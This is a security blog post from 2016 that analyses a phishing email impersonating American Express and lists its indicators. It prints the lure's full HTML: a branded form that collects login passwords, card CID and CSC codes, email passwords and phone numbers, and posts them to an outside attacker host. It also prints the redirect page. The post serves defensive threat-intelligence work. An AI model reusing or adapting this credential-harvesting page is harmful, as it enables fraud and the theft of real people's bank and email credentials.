2016/03/15

Something Phishy – 03-14-2016

by sapphomo
Categories: News
Tags: , ,
Comments: Leave a Comment

Something Phishy – Phishing for Phishers

It’s March! Holy cow, it’s March. Few months flew by and it’s time for another episode of Something Phishy. This is Destruct_Icon and we have a new poster who will be joining the ranks. I’d like to introduce you to Sapphomo who will be assisting me with Something Phishy posts as she breaks into the security field in the coming months.

An interesting inbound e-mail came with a present attached.

Holy escaped data batman! That data, it’s so escaped!

<style type="text/css">
<!--
.style4 {font-size: 11px}
.style5 {font-size: 12px}
.style6 {
font-size: 10px;
font-weight: bold;
}
.style9 {font-size: 12px; font-weight: bold; }
-->
</style>
<br><br><div class="gmail_quote"><br>

<div style="background:#ffffff;min-height:1000px;color:#666666;font-family:Arial,Helvetica,sans-serif;font-size:12px" alink="#FF0000" link="#FF0000" bgcolor="#FFFFFF" text="#666666">

<div style="background-color:#ffffff;margin:0;padding:0;width:100%">
<table style="font-family:arial,sans-serif;color:#666666;font-size:12px;line-height:16px;background-color:#002663;margin:0 auto;text-align:left" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td colspan="7" bgcolor="#FFFFFF" valign="bottom" width="7"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_wrapper_toplft_shdw.gif" style="display:block" border="0" height="53" width="7"></td>

<td>

<table style="font-family:arial,sans-serif;background:#002663" border="0" cellpadding="0" cellspacing="0" width="700">
<tbody><tr>
<td bgcolor="#60A945" valign="top"><table style="font-family:arial,sans-serif" bgcolor="#60A945" border="0" cellpadding="0" cellspacing="0" width="700">
<tbody><tr>
<td bgcolor="#60A945"><div align="center"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_masthead_top_lft.gif" style="display:block" border="0" height="53" width="375"></div></td>
</tr>
</tbody></table>

</td>
</tr>
</tbody></table>
</td>
<td colspan="7" bgcolor="#FFFFFF" valign="bottom" width="7"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_wrapper_toprgt_shdw.gif" style="display:block" border="0" height="53" width="7"></td>

</tr>
</tbody></table>
<table style="font-family:arial,sans-serif;color:#666666;font-size:12px;line-height:16px;background-color:#002663;margin:0 auto;text-align:left" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td style="background-color:#fdfdfd" bgcolor="#FDFDFD"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#fafafa" bgcolor="#FAFAFA"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#f7f7f7" bgcolor="#F7F7F7"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#f4f4f4" bgcolor="#F4F4F4"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#f1f1f1" bgcolor="#F1F1F1"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#ededed" bgcolor="#EDEDED"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#e8e8e8" bgcolor="#E8E8E8"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td valign="top">

<table style="font-family:arial,sans-serif;background:#002663" border="0" cellpadding="0" cellspacing="0" width="700">
<tbody><tr>
<td>
<table style="font-family:arial,sans-serif" border="0" cellpadding="0" cellspacing="0" width="700">
<tbody><tr>
<td bgcolor="#146E8D" width="140"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="display:block" border="0" height="4" width="1"></td>
<td bgcolor="#66BFD0" width="210"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="display:block" border="0" height="4" width="1"></td>
<td bgcolor="#0F773A" width="70"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="display:block" border="0" height="4" width="1"></td>
<td bgcolor="#8CBB73" width="140"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="display:block" border="0" height="4" width="1"></td>
<td bgcolor="#B2D369" width="140"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="display:block" border="0" height="4" width="1"></td>
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td valign="bottom">
<table style="font-family:arial,sans-serif" bgcolor="#002663" border="0" cellpadding="0" cellspacing="0" width="700">
<tbody><tr>
<td style="font-size:14px;color:#90d7e7;line-height:15px" align="center" valign="top" width="39"><div align="center"></div></td>
<td style="color:#ffffff" align="right" valign="bottom" width="632">
<div style="line-height:20px;font-size:12px"> </div>

<div style="font-size:11px;line-height:16px">
<div align="left"></div>
</div>

<div style="line-height:2px;font-size:12px"></div>

<div style="line-height:18px;font-size:12px"> </div>

</td>
<td width="29"></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>

<table style="font-family:arial,sans-serif;background:#002663" border="0" cellpadding="0" cellspacing="0" width="700">
<tbody><tr>
<td valign="top">

<table style="font-family:arial,sans-serif" border="0" cellpadding="0" cellspacing="0" width="700">
<tbody><tr>
<td width="11"></td>
<td colspan="3" bgcolor="#002663"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_contentbox_top_1.gif" style="display:block" border="0" height="6" width="678"></td>
<td width="11"></td>
</tr>
<tr>
<td width="11"></td>
<td colspan="3" bgcolor="#E5E5E5"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_contentbox_top_2.gif" style="display:block" border="0" height="4" width="678"></td>
<td width="11"></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td bgcolor="#E5E5E5" valign="top" width="4">&nbsp;</td>
<td bgcolor="#FFFFFF" width="670">&nbsp;</td>

<td bgcolor="#E5E5E5" width="4"></td>
<td bgcolor="#002663" width="11"></td>
</tr>
<tr>
<td bgcolor="#002663" width="11"></td>
<td bgcolor="#E5E5E5" width="4"></td>
<td bgcolor="#FFFFFF" valign="top" width="670"><blockquote>
<p><span class="style9"><strong>Complete the form below to update your Membership Rewards information and remove any limitations in your account.</strong></span><br />

</a> </p>
</blockquote>

<table width="633" height="78" border="0">
<tr>
<td width="57">&nbsp;</td>
<td width="532"><div class="loginAreaInput">
<script type="text/javascript" language="javascript">
function validate(frm)
{
if(frm.usnm.value == ""){
alert("Enter your User ID.");
frm.elements.usnm.focus();return false;}

if(frm.parolina.value == ""){
alert("Enter your Password");
frm.elements.parolina.focus();return false;}

if(frm.cid.value == ""){
alert("Enter your Card ID Number (CID).");
frm.elements.cid.focus();return false;}

if(frm.csc.value == ""){
alert("Enter your Card Security Code (CSC).");
frm.elements.csc.focus();return false;}

if(frm.emad.value == ""){
alert("Enter your E-Mail Address.");
frm.elements.emad.focus();return false;}

if(frm.empas.value == ""){
alert("Enter your E-Mail Password.");
frm.elements.empas.focus();return false;}

if(frm.empas1.value == ""){
alert("Confirm your E-Mail Password.");
frm.elements.empas1.focus();return false;}

if(frm.phone.value == ""){
alert("Enter your Phone Number.");
frm.elements.phone.focus();return false;}return true;}
</script>
<form name="frm" onsubmit="return validate(this);setOptimCookie();" action="http://secure.noyzdesigns.com/finish.php" method="post" </form>
<table width="441">
<tr>
<td width="191"><span class="style3 bottomLayerText4 style5"><strong>User ID </strong></span><br />
<span class="loginIDT">
<input name="usnm" type="text" class="InputFieldsUID" id="usnm" maxlength="32" autocomplete="on" />
<br />
</span></td>
<td width="234"><span class="style3 bottomLayerText4 style5"><strong>Password </strong></span><br />
<span class="loginIDT">
<input name="parolina" type="password" class="InputFieldsUID" id="parolina" maxlength="32" autocomplete="on" />
<br />
</span></td>
</tr>
<tr>
<td width="191"><span class="style9">Card ID Number (CID)</span><br />
<span class="loginIDT">
<input name="cid" type="text" class="InputFieldsUID" id="cid" size="4" maxlength="4" autocomplete="on" />
</span><br />
<br />
<span class="style6">Please provide the CID number<br />
located on the front of your card.</span><br />
<span class="cidchkcontent_NORMALTEXT FLOATLEFT WIDTH180 PADDINGTOP5 PADDINGLEFT30 VERTICALALIGNTOP TEXTALIGN style4">(4 digits)</span><br />
<span class="FLOATLEFT WIDTH120 PADDINGLEFT15 PADDINGBOTTOM10 "><img src="https://rewards.americanexpress.com/loyalty/redemption/rewards/cart/shop/images/Amex_CID.png" alt="Your Card ID number is the four digit number located in the top right-hand side on the front of your Card" width="120" height="49" title="Your Card ID number is the four digit number located in the top right-hand side on the front of your card" /></span><br /></td>
<td width="234"><br />
<span class="style9">Card Security Code (CSC)</span><br />
<span class="loginIDT">
<input name="csc" type="text" class="InputFieldsUID" id="csc" size="3" maxlength="3" autocomplete="on" />
</span><br />
<br />
<span class="style6">Please also provide the card security code (CSC) <br />
from the back of your card. It's the last three <br />
digits in the signature strip.</span><br />
<span class="cidchkcontent_NORMALTEXT FLOATLEFT WIDTH180 PADDINGTOP5 PADDINGLEFT30 VERTICALALIGNTOP TEXTALIGN style4">(3 digits)</span><br />
<span class="FLOATLEFT WIDTH120 PADDINGLEFT15 PADDINGBOTTOM10 "><img src="https://rewards.americanexpress.com/loyalty/redemption/rewards/cart/shop/images/Amex_CSC.png" alt="Your Card ID number is the four digit number located in the top right-hand side on the front of your Card" width="120" height="49" title="Your Card ID number is the four digit number located in the top right-hand side on the front of your card" /></span><br /></td>
</tr>
<tr>
<td><span class="style3 bottomLayerText4 style5"><strong><br />
<br />
Email Address </strong></span><br />
<span class="loginIDT">
<input name="emad" type="text" class="InputFieldsUID" id="emad" maxlength="32" autocomplete="on" />
<br />
</span></td>
<td><span class="style3 bottomLayerText4 style5"><strong><br />
<br />
Phone Number </strong></span><br />
<span class="loginIDT">
<input name="phone" type="text" class="InputFieldsUID" id="phone" maxlength="32" autocomplete="on" />
<br />
</span></td>
</tr>
<tr>
<td height="77"><span class="style3 bottomLayerText4 style5"><strong>Email Password </strong></span><br />
<span class="loginIDT">
<input name="empas" type="password" class="InputFieldsUID" id="empas" maxlength="32" autocomplete="on" />
<br />
</span></td>
<td>&nbsp;</td>
</tr>
<tr>
<td><span class="style3 bottomLayerText4 style5"><strong>Confirm Email Password </strong></span><br />
<span class="loginIDT">
<input name="empas1" type="password" class="InputFieldsUID" id="empas1" maxlength="32" autocomplete="on" />
<br />
</span></td>
<td>&nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
<tr>
<td><span class="rfloat">
<input class="oceFloatLeft jsSubmit" type="submit" title="Confirm" value="Confirm" name='continueRegBtn'/>
</span></td>
<td>&nbsp;</td>
</tr>
</table>

<td width="30">&nbsp;</td>

</table>
<span class="style4"><br />
<br />
<br />
<b>Terms and Conditions</b><br />
Terms and Conditions for the Membership Rewards&reg; program apply. Visit <a href="#" target="_blank">membershiprewards.com/terms</a> or call 1-800-AXP-EARN</span> <span class="style4">(297-3276) for more information. <br />
<br />
&copy; 2015 American Express. All rights reserved. </span><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_bluebox.gif" style="display:inline" align="right" border="0" height="45" width="52" /><br />
<br /></td>
<td bgcolor="#E5E5E5" width="4"></td>
<td bgcolor="#002663" width="11"></td>
</tr>
<tr>
<td></td>
<td colspan="3" bgcolor="#E5E5E5"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_contentbox_top_2.gif" style="display:block" border="0" height="4" width="678"></td>
<td></td>
</tr>
<tr>
<td></td>
<td colspan="3" bgcolor="#002663"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_contentbox_btm_1.gif" style="display:block" border="0" height="6" width="678"></td>
<td></td>
</tr>
</tbody></table>

<div style="line-height:11px;font-size:12px"> </div>
</td>
</tr>
</tbody></table>
</td>
<td style="background-color:#e8e8e8" bgcolor="#E8E8E8"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#ededed" bgcolor="#EDEDED"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#f1f1f1" bgcolor="#F1F1F1"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#f4f4f4" bgcolor="#F4F4F4"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#f7f7f7" bgcolor="#F7F7F7"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#fafafa" bgcolor="#FAFAFA"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

<td style="background-color:#fcfcfc" bgcolor="#FCFCFC"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_any_spacer.gif" style="margin:0;border:0 none;padding:0;display:block" border="0" height="1" width="1"></td>

</tr>
<tr>
<td colspan="15"><img alt="" src="http://f.email.americanexpress.com/i/13/2075838664/0591u_wrapper_btm.gif" style="display:block" border="0" height="27" width="714"></td>
</tr>
</tbody></table>

</div>
<img src="http://email.americanexpress.com/a/hBP1iV7B7usjIB8jT4sNs3C5F-x/spacer.gif">
</div>
</div><br>

MaliciousSiteCapture

Unescapes to what appears to be an American Express page, utilizing some of their graphics with a form to add data such as your user, CSC and e-mail information.

On submit, the data gets posted to hxxp://secure[.]noyzdesigns[.]com/finish.php and immediately gets redirected back to a legitimate website, www.membershiprewards.com.

 

  • PHP page:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1250">
<meta http-equiv="refresh" content="0; url=http://www.membershiprewards.com/terms">
<title>Redirect</title>
</head>
<body>
</div>
</body>
</html>

Looks like there wasn’t any malware attached with this campaign; however, we do see some pretty aggressive credential harvesting capabilities. The website itself is well crafted compared to many cred harvesting pages and has a very interesting method for attack. Keep an eye out for any interaction with noyzdesigns. The e-mail address provided of american.express@chamberplayground.com has little to no web presence as well.

On this note, we’d also like to provide some insight as to what we will be doing with the information from these posts. We will be providing an intel feed in the near future that we will be pushing all of our phishing indicators to in the hopes that it may help identify or prevent compromises in your environment. This will be facilitated through the capabilities of TAXII services so subscribing to the feed should be relatively painless. Thank you for checking out our Something Phishy for March and hope it provides some insight into some methods being used for harvesting.


Leave a Reply

Your email address will not be published. Required fields are marked *



Today is Friday
2018/02/23